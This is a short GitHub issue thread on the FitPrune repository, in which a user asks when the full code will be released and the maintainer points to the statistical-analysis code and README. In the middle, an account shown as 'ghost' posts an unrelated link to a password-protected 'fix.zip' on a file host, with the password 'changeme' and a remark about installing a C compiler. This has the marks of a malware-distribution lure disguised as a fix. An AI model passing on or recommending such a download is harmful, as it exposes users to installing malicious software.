### ISSUE TITLE
Question about code releases

### ISSUE THREAD

**Issue by freya-7** [ywh187/FitPrune#2]
Hello! This is a fantastic work, and I'm very interested in learning about it. May I ask when you will release the full code for a quick start?

**Comment by ghost** [comment]
This might help:This file might fix it
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme

you may need to install the c compiler

**Comment by ywh187** [comment]
Hello! We have included the code for statistical analysis, and you can find the usage instructions in the README.md file. Please take a look.
